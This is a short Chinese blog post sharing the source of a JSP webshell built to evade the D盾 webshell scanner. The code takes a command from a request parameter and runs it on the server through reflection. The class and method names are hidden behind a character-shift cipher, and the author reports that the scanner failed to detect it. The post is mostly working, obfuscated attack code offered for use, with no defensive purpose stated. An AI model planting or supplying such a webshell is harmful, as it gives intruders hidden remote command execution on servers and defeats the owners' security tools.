一枚菜鸡的D盾bypass源码

释放双眼,带上耳机,听听看~!
来自一枚菜鸡的bypass~各位看官下手轻点。

一、构造webshell

利用用类反射+移位密码构造webshell

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%!public String vADM(String mPk){String BJM="";for (int i = 0; i < mPk.length(); i++) {BJM+=(char)(mPk.charAt(i)+-4);}return BJM;}
%>
<% String sbd=request.getParameter("websafe");if(sbd!=null){ Class cjwV = Class.forName(vADM("neze2perk2Vyrxmqi"));
    Process rsSk = (Process) cjwV.getMethod(vADM("i|ig"), String.class).invoke(cjwV.getMethod(vADM("kixVyrxmqi")).invoke(null),sbd); java.io.InputStream in = rsSk.getInputStream();byte[] iLT = new byte[2048];out.print("
");while(in.read(iLT)!=-1){ out.println(new String(iLT)); }out.print("

"); }
%>另存为jsp文件。

二、测试免杀

OK成功免杀D盾!

WEB安全质量好文

PHP代码执行注入与命令执行

2020-4-10 14:44:09

企业安全公众号文章数据安全质量好文

最近流行的勒索病毒情报汇总

2020-4-10 16:43:52

2 条回复 A文章作者 M管理员
  1. 学习学习,谢谢大佬分享

    • 好的呢~一起进步(小声bb:我是个菜鸡)

个人中心
购物车
优惠劵
有新私信 私信列表
搜索